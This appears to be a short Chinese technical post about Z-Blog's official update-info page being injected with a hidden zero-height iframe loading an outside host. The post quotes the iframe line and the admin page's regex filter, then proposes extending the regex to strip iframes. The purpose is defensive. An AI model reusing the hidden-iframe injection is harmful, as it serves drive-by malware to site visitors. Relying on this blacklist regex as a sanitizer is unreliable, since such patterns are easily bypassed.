官方的自动通讯页面http://update.rainbowsoft.org/info/被加了<iframe src=http://c.j8j8.biz/103/ width=100 height=0></iframe>,估计是被arp了。
zblog通过/admin/c_updateinfo.asp这个页面与官方进行通讯,过滤代码仅仅使用了一段script的过滤正则表达式,如下
objRegExp.Pattern="<script.*/*>|</script>|<[a-zA-Z][^>]*=['""]+javascript:\w+.*['""]+>|<\w+[^>]*\son\w+=.*[ /]*>"
补救方法:
1、通知zblog管理员清除病毒
2、修改过滤代码:objRegExp.Pattern="<script.*/*>|</script>|<[a-zA-Z][^>]*=['""]+javascript:\w+.*['""]+>|<\w+[^>]*\son\w+=.*[ /]*>|<iframe.*/*>|</iframe>"